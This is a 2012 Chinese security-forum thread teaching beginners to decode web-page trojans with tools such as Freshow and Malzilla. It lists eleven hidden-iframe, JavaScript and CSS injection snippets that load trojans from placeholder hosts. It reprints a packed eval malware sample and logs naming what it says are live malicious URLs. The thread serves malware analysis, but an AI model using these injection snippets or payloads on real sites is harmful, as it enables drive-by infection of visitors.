KaFan Hunters 入门教程帖

显示全部楼层 · 发表于 2012-6-2 00:51:52

教程来源于kongzi大叔

入门教程适合大多数对网马解密感兴趣的饭团

希望能帮助大家尽快上手网马解密

显示全部楼层 · 发表于 2012-6-2 00:53:48

一.  网页挂马的概念：

   网页挂马是指：在获取网站或者网站服务器的部分或者全部权限后，在网页文件中插入一段恶意代码，这些恶意代码主要是一些包括IE等漏洞利用代码，用户访问被挂马的页面时，如果系统没有更新恶意代码中利用的漏洞补丁，则会执行恶意代码程序，进行盗号等危险操作。

二.常见的网页挂马方式：
1. 框架挂马：
  <iframe src=http://www.xxx.com/muma.htm width=0 height=0></iframe>

2.  js文件挂马:
首先将以下代码：
document.write("<iframe width=0 height=0 src='地址'></iframe>");
保存为xxx.js，
则JS挂马代码为:
<script language=javascript src=xxx.js></script>

3. js变形加密
<SCRIPTlanguage="JScript.Encode" src=http://www.xxx.com/muma.txt></script>muma.txt可改成任意后缀

4. flash木马
http://网页木马地址插入木马地址 width=10 height=10", "GET" 宽度和高度，方式后面的照添，更改木马地址就可以了。

5. 不点出现链接的木马
<a href="http://www.163.com(迷惑的超级连接地址，显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="你的木马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,
menubar=no,scrollbars=no,resizable=no,
copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

6.隐蔽挂马：

top.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'[/url]

7.css中挂马：

body{background-image:url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

8.Java挂马：

<SCRIPT language=javascript>
window.open （"地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

9.图片伪装：
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

10. 伪装调用：
  <frameset rows="444,0" cols="*">
  <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
  <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

11.高级欺骗：
<a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" > 页面要显示的内容</a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

三.常见网马所利用的漏洞判断方式：

1. 根据恶意网址名称来判断漏洞：

2.根据CLSID判断漏洞：

常见网马解密工具：

1.Freshow工具(作者：jimmyleo大牛)

工具简介(摘自freshow帮助文档)：Freshow是一款脚本解密的工具，其开发的初衷是减少机械操作和简化处理步骤，使您能专注于脚本本身。一般解密方法有手动和工具两种，Freshow尽量使得工作在一个工具下完成，当然它还不是那么成熟，您可以搭配其他工具来完成工作。Freshow目前具备过滤和解密功能模块能满足常见加密分析所需的操作。它的性能和稳定性还有最终的成果取决于您对Freshow的熟悉程度、对脚本知识的了解程度以及分析程度。

2.HTMLDecoder(作者：祥子大牛)
工具简介：这是一款自动解密的工具，功能非常强大，可惜俺对它研究还不是很深。只用过它解密过flash网马和pdf网马。

3.malzilla又称神器
工具简介：这个工具很好很强大，freshow无法解出的网马，使用这个工具基本都可以解出。

4.MDecoder(麦田大牛)
工具简介（摘自麦田的博客）：
1，Freshow的模仿者，使用WIN32汇编编写。
2，支持对网马中swf和exe的查找（不完善）。
3，支持网马识别，可通过修改classid.ini来扩充特征。

暂时先介绍这么多，还有很多辅助类的工具，后续会一一介绍给大家。

显示全部楼层 · 发表于 2012-6-2 01:00:37

1.Freshow解密工具的详细用法；

先来认识认识我们用到工具(Freshow)，截图如下

freshow工具使用的详细注释如下：
1.URL：要解密的网址地址
2.Check：用来获取要解密网址的源代码(此工具要在联网状态下使用)
3.上操作区域：获取到的网站源代码在此处显示
4.C：清除代码，用来清除上操作区域和下操作区域的代码
5.P：是复制代码
6.Filter：过滤网页源代码中的js、iframe、script链接
7.Decoder：解密按钮，用来解密加密的网页源代码

8.过滤选项：
Qeye：过滤网页源代码中潜在的恶意链接，如：iframe、script结果会显示在收集区域；
Connect：连接字符串，如‘a+b’，使其变为：ab；
Nuls：过滤空字符串，使得脚本更容易阅读；
Replace：替换字符串；
Reverse：逆转字符，一些特殊的脚本采用这种方式。
解密选项：
9.Esc：可以转换%、%u、\x等形式的转义字符，\x可以再操作异或，如果知道确切的值，就在附加区域
里输入它，或者使用枚举异或enumXOR，会自动处理并返回结果；
ASCII：可以转换“1,2,3”形式的ASC码，分割符可以覆盖；
US-ASCII ：代码类似汉字，且代码中包含有： <meta?http-equiv="Content-Type"?
c?/>
Alpha2：这个算法针对在Replayer的漏洞利用上，首先转换到\x形式，因为可能会经过异或操作；
enumXOR：对十六进制的数据进行枚举异或，并返回结果；
Base64：这种加密方式很少见，加密特征大小写字母及数字混排，末尾可能包含等号；
Winwebmail:网马加密代码中有类似：document.write(unencode(webmm,3422));代码(至今未见过此类加密方式，这个不确定)

10.密钥 (目前主要ie7.0漏洞的解密需要密钥)
11.UP:将下操作区域的内容翻转到上操作区域进行二次解密
12.上选择按钮：对上操作区域代码进行清空或复制
13.下选择按钮：对下操作区域代码进行清空或复制
14.下操作区域：解密出网马结果显示在此处
15.收集区域：由Qeye筛选出的恶意链接被罗列在这里，可以通过上移、下移、删除、全选等操作。当选
中其中一个链接时，自动处理为新的URL，这时可以check得到新的源代码，显示在上操作区域，可继续
解密
16.ALL: 勾选所有收集区域的地址
17.Del：删除不需要的链接
18.上移按钮：将恶意链接地址进行上移操作
19.下移按钮：将恶意链接地址进行下移操作
20.Log：自动将选择项复制到剪切板并做一定的格式化处理，方便直接在论坛或其他地方与他人共享分
析结果
21.Download：将选择的网马地址复制到剪切板，并下载相应的网马(例如：迅雷、flashget开启状态下
，并设置了监视相应的文件类型，此时点击download按钮就会调出默认的下载工具下载网马。)
22.Obj：目标插入区域，将最终解密出来的网马地址，复制到obj区域，并按Insert插入，它将会被自动
插入到之前选中的链接后，作为子级
23.Insert：插入网马链接地址
24.State：连接状态，可通过连接状态来判断网址是否失效。

一个完整的freshow日志，其中红色部分均为真实的网马地址：
注意：该网站有多处被挂马，内容都相同，只解出其中一个即可。
Log is generated by FreShow.
[wide]http://qianshou.tfol.com
[script]http://qianshou.tfol.com/Js/highslide-with-html.js
[script]http://3b3.org/c.js
      [frame]http://4t6nhh.6600.org/a/a100.htm
         [frame]http://4t6nhh.6600.org/a/cnzz.htm
            [frame]http://4t6nhh.6600.org/a/kk.htm
                  [script]http://4t6nhh.6600.org/a/14.js
                     [object]http://xin89221.com/love/windoss.css
            [frame]http://4t6nhh.6600.org/a/flash.htm
                  [frame]http://4t6nhh.6600.org/a/iqq.html
            [object]http://4t6nhh.6600.org/a/i16.swf
                  [object]http://4t6nhh.6600.org/a/i28.swf
                  [object]http://4t6nhh.6600.org/a/i45.swf
                     [object]http://4t6nhh.6600.org/a/i47.swf
                        [object]http://4t6nhh.6600.org/a/i64.swf
                              [object]http://4t6nhh.6600.org/a/i115.swf
                  [frame]http://4t6nhh.6600.org/a/fqq.html
                  [object]http://4t6nhh.6600.org/a/f16.swf
                     [object]http://4t6nhh.6600.org/a/f28.swf
                        [object]http://4t6nhh.6600.org/a/f45.swf
                              [object]http://4t6nhh.6600.org/a/f47.swf
                                 [object]http://4t6nhh.6600.org/a/f64.swf
                                    [object]http://4t6nhh.6600.org/a/f115.swf
            [frame]http://4t6nhh.6600.org/a/xx.htm
                  [script]http://4t6nhh.6600.org/a/xx.js
                     [object]http://xin89221.com/love/windoss.css
            [frame]http://4t6nhh.6600.org/a/office.htm
                  [script]http://4t6nhh.6600.org/a/office.js
                     [object]http://xin89221.com/love/windoss.css
            [frame]http://4t6nhh.6600.org/a/02.htm
                  [script]http://4t6nhh.6600.org/a/set.js
                     [object]http://xin89221.com/love/windoss.css
            [script]http://4t6nhh.6600.org/a/reee.js
                  [frame]http://4t6nhh.6600.org/a/real.htm
                     [script]http://4t6nhh.6600.org/a/real.js
                        [object]http://xin89221.com/love/windoss.css
                  [frame]http://4t6nhh.6600.org/a/real.html
                     [script]http://4t6nhh.6600.org/a/re11.js
                        [object]http://xin89221.com/love/windoss.css
            [script]http://4t6nhh.6600.org/a/rkkk.js
                  [frame]http://4t6nhh.6600.org/a/lz.htm
                     [script]http://4t6nhh.6600.org/a/lz.js
                        [object]http://xin89221.com/love/windoss.css
                  [frame]http://4t6nhh.6600.org/a/bf.htm
                     [script]http://4t6nhh.6600.org/a/bf1.js
                     [script]http://4t6nhh.6600.org/a/bf.js
                        [object]http://xin89221.com/love/windoss.css

2.网马解密之——Eval篇；

一. eval加密是在网马解密中最常见的，eval在jscript脚本中实际上是一个函数，简单可以理解为执行语句的的意思。

1. Eval方法

参数 :codeString 必选。包含有效 JScript 代码的字符串。eval 函数允许动态执行 JScript 源代码。

2.  eval函数特点：是将字符串转换为脚本代码，然后就可以执行了，但是，如果字符串里面还有HMTL标签的话，它就不能执行了。

二. Eval解密方法之alert方法：
1. alert函数：

• 在要对eval解密之前首先需要了解一下alert这个函数，大家可能有个疑问，在解马的过程中怎样才能保证自身系统安全而又不中招呢，我们知道要是直接去访问一些经过加密的网马地址，就相当于在电脑上直接运行了网马。既要能将网马解出，又要保证系统的安全。这时我们就要用到alert这个函数。

• alert函数在jscript中有弹出消息内容的作用，我们正是可以利用这一特性，来保证在解马的过程中不会中招。请看下面一个小例子：

• <script>alert("你好！")</script>将此段代码，粘贴至记事本中保存为htm格式(文件名随意)，直接运行后可看到alert函数的效果。

了解以上内容后，接下来我们来看一个eval的实例：
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))

将此段代码复制粘贴至记事本中，将其中的eval修改为alert其余内容不变，但要加上<script></script>实际变为一个脚本。保存为htm(文件名任意)处理后的代码如下：
<script>
alert(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))
</script>

解密结果见下图，我们看到红色框内容为网马的下载地址，鼠标选中这个对话框，ctrl+a全选再ctrl+c复制，可将整个代码粘贴至记事本上。获得代码地址后，可使用下载工具直接下载网马。

Malzilla

显示全部楼层 · 发表于 2012-6-2 01:08:31

3.网马解密之——Document.write篇；

一.Document.write 函数简介：
在Microsoft JScript 提供了两种方式来在浏览器中直接显示数据。可以使用write( ) 和 writeln( )，这两个函数是document 对象的方法。也可以在浏览器中以表格的方式显示信息，以及用警告、提示和确认消息框来显示信息。

使用document.write( ) 和 document.writeln( )显示信息。最常用的方式是 document 对象的 write( ) 方法。该方法用一个字符串作为其参数，并在浏览器中显示。该字符串可以是普通文本或 HTML。
字符串可以用单引号或双引号引起来。这样可以引用那些包含引号或撇号的内容。

注：Document.write函数是将字符串转换为Html代码，里面必须有HTML脚本标签，脚本才可以执行，否则，将会被当作字符串输出在网页上。

二.Document.write函数实例
例1：
<script>
document.write("hell world")
</script>
将此段代码粘贴至记事本，保存为htm格式直接运行打开。这段代码的执行结果实际上是将hell world 在网页显示出来。

例2：
<script>
document.write("<iframe src=http://www.rising.com.cn></iframe>")
</script>

将上面的代码粘贴至记事本，保存为htm直接运行打开，这段代码的执行结果为在联网的情况下，直接会在网页上显示一个框架，而框架的内容为瑞星官方网站。

我们来简单分析一下这两个例子的执行结果为什么不同：

• 例1实际上是一个简单的输出，就是将document.write函数后的内容输出至页面。

• 例2内容包含了html脚本标签：<iframe>、 src、</iframe> ，此时将会直接执行脚本，而执行的结果为在网页上显示一个框架，而框架的内容为瑞星官方网站。

• 例1和例2实际上是对“Document.write函数是将字符串转换为Html代码，里面必须有HTML脚本标签，脚本才可以执行，否则，将会被当作字符串输出在网页上”。这段话的一个印证。

Document.write解密方法之alert方法，即在获得的包含有document.write函数的网马代码中，将document.wirte替换为alert函数，将代码保存至记事本，扩展名为htm文件，直接浏览运行。
下面我们将结合一个实例来进行讲解：
http://www.photoman.net.cn/feng/3.htm
将上述网址恶意链接地址粘贴至freshow工具url处，我们点击check进行链接，获取网站源代码，详细操作请看下面截图

我们看到在获得源代码中红色框标出的为document.write，接下来我们点击freshow的p按钮将代码复制，将此段代码保存至记事本，使用记事本的查找功能，查找内容为“document.write”，将document.write替换为alert，将修改好的代码保存为扩展名为htm格式文件，直接运行打开保存好的网页。

运行结果：

我们在浏览刚才保存的htm文件过程中，会有上述截图的提示，鼠标右键点中这个提示，选择允许阻止的内容，在弹出的安全警告对话框，点击是继续运行。点击两次确定后会看到如下内容：

在这个加密的源代码中，实际上隐含了这么一段代码：
<script src=3.css></script>
将此代码粘贴至freshow上操作区域，点击filter按钮，我们将会在数据收集区域看到两个网址。相见下面截图

接下来我们点击数据收集区域的http://www.photoman.net.cn/feng/3.css，进行check链接获取网页源代码。

实际我们解密的这个恶意网址是根据realplayer漏洞，而RealPlayer采用的加密形式为alpha2，这段代码实际上是一个alpha2加密的特例，后续我们会详细讲解alpha2解密方法。
这里的解密选项自然选择alpha2，点击decode进行解密，相见下列截图：

接下来点击up按钮，将第一次解密的结果上翻至上操作区域进行二次解密，解密选项选择esc，再点击decode完成最终的解密，获得网马下载地址。

红色框内容为实际的网马下载地址。
接下来我们可以将网马地址复制粘贴至obj区，点击insert按钮，将解密出的网马地址插入数据收集区。

点击all按钮全选，再点击log按钮，将解密出日志格式化输出。

Log is generated by FreShow.
[wide]http://www.photoman.net.cn/feng/3.htm
[script]http://www.photoman.net.cn/feng/3.css
[object]http://a.cdd1.com/m.css

显示全部楼层 · 发表于 2012-6-2 01:13:17

网马解密中级篇：

网马解密中级篇（中）.rar (1.35 MB, 下载次数: 543)

显示全部楼层 · 发表于 2012-6-16 07:20:47

这个有技术含量

显示全部楼层 · 发表于 2012-6-16 13:12:01

hunter组的教程看的人不多啊

显示全部楼层 · 发表于 2012-6-16 14:03:28

屁颠是来招人的

显示全部楼层 · 发表于 2012-6-16 16:21:30

我看看这些东西以后也可以进hunter组了

显示全部楼层 · 发表于 2012-6-16 19:24:52

感谢分享，非常想进hunter组，苦于能力不够，看来现在有机会了

[评测] KaFan Hunters 入门教程帖

评分